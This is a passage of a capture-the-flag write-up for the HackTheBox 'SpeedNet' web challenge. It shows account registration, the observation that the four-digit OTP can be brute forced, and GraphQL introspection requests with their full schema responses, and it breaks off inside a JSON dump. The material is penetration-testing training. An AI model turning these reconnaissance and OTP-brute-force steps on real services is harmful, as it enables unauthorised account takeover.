> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cwes-track/htb-speednet.md).

# HTB - SpeedNet

Browsing to the given ip results in a internet service web application with a login and a register page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo3663BRnIfo0xPb6TKCW%2Fimage.png?alt=media&amp;token=bd297b32-6552-4dee-b35c-6a3a49376d15" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fs3g3u9106K7VfERJV7Ah%2Fimage.png?alt=media&amp;token=f083a4d5-4ce5-4b1d-85a8-cbf13e95c71e" alt=""><figcaption></figcaption></figure>

we are also given access to a email service as <test@email.htb>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrAFpRaLhsoCvP4rEcJDQ%2Fimage.png?alt=media&amp;token=4b0432fd-6a68-4c15-877c-d7817aae1095" alt=""><figcaption></figcaption></figure>

Lets create and account an as test.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfSz0CiYgs1wi6lNaY5j7%2Fimage.png?alt=media&amp;token=484e8faf-3f86-4995-9816-0188046ec8b5" alt=""><figcaption></figcaption></figure>

makes a request to graphql endpoint

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdOTqeIlFQexCBKhHnjVv%2Fimage.png?alt=media&amp;token=af63d36b-f8fc-4cf3-8145-2edc446e5f14" alt=""><figcaption></figcaption></figure>

Forwarding the requests, results in successful registration.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyAwgMGHMte3mkh87wl3V%2Fimage.png?alt=media&amp;token=809e1e99-2d6f-4746-bf9c-b45ddb69438a" alt=""><figcaption></figcaption></figure>

after registering received a successful mail too

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FN6hZhLV7Iypbw4u3fmzg%2Fimage.png?alt=media&amp;token=4054c547-089f-4708-a0e8-ee7d36c0de18" alt=""><figcaption></figcaption></figure>

Nothing on the dashboard as test but the profile section has a link to turn on 2factor authentication.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwrrFGSHZPk7TRguwDiVF%2Fimage.png?alt=media&amp;token=72422201-f7b7-436e-971b-0eb8a86bec2e" alt=""><figcaption></figcaption></figure>

saving the changes and logging in again a OTP is sent to the mail.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrgnxxNEsyjOlNwS855Kn%2Fimage.png?alt=media&amp;token=b1c49be1-22e8-430c-986f-43ea6858193f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ffm9NV1xlW48QCLeRnBt5%2Fimage.png?alt=media&amp;token=78708418-6935-4746-99e8-116a09be6338" alt=""><figcaption></figcaption></figure>

the OTP is weak as it only contains 4 digits which can be brute forced to obtain.

If we input the OTP correctly, then we will redirected to the dashboard page as well.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnMJAd1zBwKCoXs302Rc4%2Fimage.png?alt=media&amp;token=578971cd-c47a-4d26-ae59-362a21e36e17" alt=""><figcaption></figcaption></figure>

That said reading the GraphQL schema would helpful to understand what to target and query.

### Check if Introspection is Enabled

Before attempting complex GraphQL queries, we need to verify if the server is running GraphQL and whether Introspection is enabled in production.

```powershell
POST /graphql HTTP/1.1
Host: 154.57.164.81:32756
Content-Length: 110
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsImlhdCI6MTc4NjIwMDQ1OSwiZXhwIjoxNzg2MjA0MDU5fQ.90pOxOFVwuRs37eLVPtMrhdaPktItxpu0Vl8cEs1kPc
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: <http://154.57.164.81:32756>
Referer: <http://154.57.164.81:32756/billing>
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"query":"{ __schema { mutationType { fields { name args { name type { name kind ofType { name } } } } } } }"}
```

```powershell
HTTP/1.1 200 OK
Server: nginx/1.28.0
Date: Sat, 08 Aug 2026 14:49:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1247
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"4df-efW/wcgdMVZA5WAMSmyOpo9YyjI"

{"data":{"__schema":{"mutationType":{"fields":[{"name":"register","args":[{"name":"input","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"RegisterInput"}}}]},{"name":"login","args":[{"name":"email","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}},{"name":"password","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}}]},{"name":"updateProfile","args":[{"name":"input","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"ProfileInput"}}}]},{"name":"forgotPassword","args":[{"name":"email","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}}]},{"name":"devForgotPassword","args":[{"name":"email","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}}]},{"name":"resetPassword","args":[{"name":"token","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}},{"name":"newPassword","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}}]},{"name":"verifyTwoFactor","args":[{"name":"token","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}},{"name":"otp","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}}]},{"name":"resendOTP","args":[{"name":"token","type":{"name":null,"kind":"NON_NULL","ofType":{"name":"String"}}}]}]}}}}

```

The server allows schema inspection, giving us access to map out internal functions and data structures.

From the 8 identified mutations, two critical targets stand out for immediate testing:

1. `devForgotPassword`: High-priority target. Development/debug endpoints left in production frequently lack rate limiting, OTP validation, or access controls.
2. `verifyTwoFactor` & `resendOTP`: Indicates MFA functionality. Potential targets for logic flaws, race conditions, or rate-limit bypasses.
3. `register` & `updateProfile`: Take custom input objects (`RegisterInput` and `ProfileInput`), but the command only gave us their names not their underlying field parameters.

### Reading Full GraphQL Schema

```powershell
POST /graphql HTTP/1.1
Host: 154.57.164.81:32756
Content-Length: 800
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsImlhdCI6MTc4NjIwMDQ1OSwiZXhwIjoxNzg2MjA0MDU5fQ.90pOxOFVwuRs37eLVPtMrhdaPktItxpu0Vl8cEs1kPc
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: <http://154.57.164.81:32756>
Referer: <http://154.57.164.81:32756/billing>
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{
  "query": "{ __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } }"
}
```

```powershell
HTTP/1.1 200 OK
Server: nginx/1.28.0
Date: Sat, 08 Aug 2026 14:55:57 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 30164
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"75d4-Y99+oDG1cANp869FDjTEm4a3Yls"

{"data":{"__schema":{"queryType":{"name":"Query"},"mutationType":{"name":"Mutation"},"subscriptionType":null,"types":[{"kind":"ENUM","name":"PlanType","description":null,"fields":null,"inputFields":null,"interfaces":null,"enumValues":[{"name":"BASIC","description":null,"isDeprecated":false,"deprecationReason":null},{"name":"PREMIUM","description":null,"isDeprecated":false,"deprecationReason":null},{"name":"BUSINESS","description":null,"isDeprecated":false,"deprecationReason":null}],"possibleTypes":null},{"kind":"ENUM","name":"PlanStatus","description":null,"fields":null,"inputFields":null,"interfaces":null,"enumValues":[{"name":"TRIAL","description":null,"isDeprecated":false,"deprecationReason":null},{"name":"ACTIVE","description":null,"isDeprecated":false,"deprecationReason":null},{"name":"INACTIVE","description":null,"isDeprecated":false,"deprecationReason":null}],"possibleTypes":null},{"kind":"ENUM","name":"InvoiceStatus","description":null,"fields":null,"inputFields":null,"interfaces":null,"enumValues":[{"name":"PENDING","description":null,"isDeprecated":false,"deprecationReason":null},{"name":"PAID","description":null,"isDeprecated":false,"deprecationReason":null},{"name":"OVERDUE","description":null,"isDeprecated":false,"deprecationReason":null}],"possibleTypes":null},{"kind":"INPUT_OBJECT","name":"RegisterInput","description":null,"fields":null,"inputFields":[{"name":"email","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"firstName","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"lastName","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"username","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"password","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"address","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"phoneNumber","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"interfaces":null,"enumValues":null,"possibleTypes":null},{"kind":"SCALAR","name":"String","description":"The `String` scalar type represents textual data, represented as UTF-8 character sequences. The String type is most often used by GraphQL to represent free-form human-readable text.","fields":null,"inputFields":null,"interfaces":null,"enumValues":null,"possibleTypes":null},{"kind":"INPUT_OBJECT","name":"ProfileInput","description":null,"fields":null,"inputFields":[{"name":"firstName","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"lastName","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"address","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"phoneNumber","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"twoFactorAuthEnabled","description":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"defaultValue":null}],"interfaces":null,"enumValues":null,"possibleTypes":null},{"kind":"SCALAR","name":"Boolean","description":"The `Boolean` scalar type represents `true` or `false`.","fields":null,"inputFields":null,"interfaces":null,"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"User","description":null,"fields":[{"name":"id","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"email","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"firstName","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"lastName","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"username","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"plan","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"PlanType","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"planStatus","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"PlanStatus","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"trialEndDate","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"nextBillingDate","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"dataUsage","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Float","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"address","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"phoneNumber","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"twoFactorAuthEnabled","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"SCALAR","name":"Int","description":"The `Int` scalar type represents non-fractional signed whole numeric values. Int can represent values between -(2^31) and 2^31 - 1.","fields":null,"inputFields":null,"interfaces":null,"enumValues":null,"possibleTypes":null},{"kind":"SCALAR","name":"Float","description":"The `Float` scalar type represents signed double-precision fractional values as specified by [IEEE 754](<https://en.wikipedia.org/wiki/IEEE_floating_point>).","fields":null,"inputFields":null,"interfaces":null,"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"ForgotPasswordResponse","description":null,"fields":[{"name":"resetToken","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"AuthResponse","description":null,"fields":[{"name":"token","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"user","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"User","ofType":null}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"Query","description":null,"fields":[{"name":"userProfile","description":null,"args":[{"name":"userId","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}},"defaultValue":null}],"type":{"kind":"OBJECT","name":"User","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"currentInvoice","description":null,"args":[],"type":{"kind":"OBJECT","name":"Invoice","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"invoiceHistory","description":null,"args":[{"name":"limit","description":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"defaultValue":null}],"type":{"kind":"LIST","name":null,"ofType":{"kind":"OBJECT","name":"Invoice","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"dataUsageStats","description":null,"args":[{"name":"days","description":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"defaultValue":null}],"type":{"kind":"LIST","name":null,"ofType":{"kind":"OBJECT","name":"DataPoint","ofType":null}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"DataPoint","description":null,"fields":[{"name":"date","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"usage","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Float","ofType":null}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"Mutation","description":null,"fields":[{"name":"register","description":null,"args":[{"name":"input","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"RegisterInput","ofType":null}},"defaultValue":null}],"type":{"kind":"OBJECT","name":"AuthResponse","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"login","description":null,"args":[{"name":"email","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"password","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"type":{"kind":"OBJECT","name":"AuthResponse","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"updateProfile","description":null,"args":[{"name":"input","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"ProfileInput","ofType":null}},"defaultValue":null}],"type":{"kind":"OBJECT","name":"User","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"forgotPassword","description":null,"args":[{"name":"email","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"devForgotPassword","description":null,"args":[{"name":"email","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"resetPassword","description":null,"args":[{"name":"token","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"newPassword","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"verifyTwoFactor","description":null,"args":[{"name":"token","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null},{"name":"otp","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"type":{"kind":"OBJECT","name":"AuthResponse","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"resendOTP","description":null,"args":[{"name":"token","description":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}],"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"Invoice","description":null,"fields":[{"name":"id","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"number","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"amount","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Float","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"status","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"InvoiceStatus","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"dueDate","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"__Schema","description":"A GraphQL Schema defines the capabilities of a GraphQL server. It exposes all available types and directives on the server, as well as the entry points for query, mutation, and subscription operations.","fields":[{"name":"description","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"types","description":"A list of all types supported by this server.","args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}}}},"isDeprecated":false,"deprecationReason":null},{"name":"queryType","description":"The type that query operations will be rooted at.","args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"mutationType","description":"If this server supports mutation, the type that mutation operations will be rooted at.","args":[],"type":{"kind":"OBJECT","name":"__Type","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"subscriptionType","description":"If this server support subscription, the type that subscription operations will be rooted at.","args":[],"type":{"kind":"OBJECT","name":"__Type","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"directives","description":"A list of all directives supported by this server.","args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Directive","ofType":null}}}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"__Type","description":"The fundamental unit of any GraphQL Schema is the type. There are many kinds of types in GraphQL as represented by the `__TypeKind` enum.\n\nDepending on the kind of a type, certain fields describe information about that type. Scalar types provide no information beyond a name, description and optional `specifiedByURL`, while Enum types provide their values. Object and Interface types provide the fields they describe. Abstract types, Union and Interface, provide the Object types possible at runtime. List and NonNull types compose other types.","fields":[{"name":"kind","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"__TypeKind","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"name","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"description","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"specifiedByURL","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"fields","description":null,"args":[{"name":"includeDeprecated","description":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"defaultValue":"false"}],"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Field","ofType":null}}},"isDeprecated":false,"deprecationReason":null},{"name":"interfaces","description":null,"args":[],"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}}},"isDeprecated":false,"deprecationReason":null},{"name":"possibleTypes","description":null,"args":[],"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}}},"isDeprecated":false,"deprecationReason":null},{"name":"enumValues","description":null,"args":[{"name":"includeDeprecated","description":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"defaultValue":"false"}],"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__EnumValue","ofType":null}}},"isDeprecated":false,"deprecationReason":null},{"name":"inputFields","description":null,"args":[{"name":"includeDeprecated","description":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"defaultValue":"false"}],"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__InputValue","ofType":null}}},"isDeprecated":false,"deprecationReason":null},{"name":"ofType","description":null,"args":[],"type":{"kind":"OBJECT","name":"__Type","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"isOneOf","description":null,"args":[],"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"ENUM","name":"__TypeKind","description":"An enum describing what kind of type a given `__Type` is.","fields":null,"inputFields":null,"interfaces":null,"enumValues":[{"name":"SCALAR","description":"Indicates this type is a scalar.","isDeprecated":false,"deprecationReason":null},{"name":"OBJECT","description":"Indicates this type is an object. `fields` and `interfaces` are valid fields.","isDeprecated":false,"deprecationReason":null},{"name":"INTERFACE","description":"Indicates this type is an interface. `fields`, `interfaces`, and `possibleTypes` are valid fields.","isDeprecated":false,"deprecationReason":null},{"name":"UNION","description":"Indicates this type is a union. `possibleTypes` is a valid field.","isDeprecated":false,"deprecationReason":null},{"name":"ENUM","description":"Indicates this type is an enum. `enumValues` is a valid field.","isDeprecated":false,"deprecationReason":null},{"name":"INPUT_OBJECT","description":"Indicates this type is an input object. `inputFields` is a valid field.","isDeprecated":false,"deprecationReason":null},{"name":"LIST","description":"Indicates this type is a list. `ofType` is a valid field.","isDeprecated":false,"deprecationReason":null},{"name":"NON_NULL","description":"Indicates this type is a non-null. `ofType` is a valid field.","isDeprecated":false,"deprecationReason":null}],"possibleTypes":null},{"kind":"OBJECT","name":"__Field","description":"Object and Interface types are described by a list of Fields, each of which has a name, potentially a list of arguments, and a return type.","fields":[{"name":"name","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"description","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"args","description":null,"args":[{"name":"includeDeprecated","description":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"defaultValue":"false"}],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__InputValue","ofType":null}}}},"isDeprecated":false,"deprecationReason":null},{"name":"type","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"isDeprecated","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"deprecationReason","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"__InputValue","description":"Arguments provided to Fields or Directives and the input fields of an InputObject are represented as Input Values which describe their type and optionally a default value.","fields":[{"name":"name","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"description","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"type","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__Type","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"defaultValue","description":"A GraphQL-formatted string representing the default value for this input value.","args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"isDeprecated","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"deprecationReason","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"__EnumValue","description":"One possible value for a given Enum. Enum values are unique values, not a placeholder for a string or numeric value. However an Enum value is returned in a JSON response as a 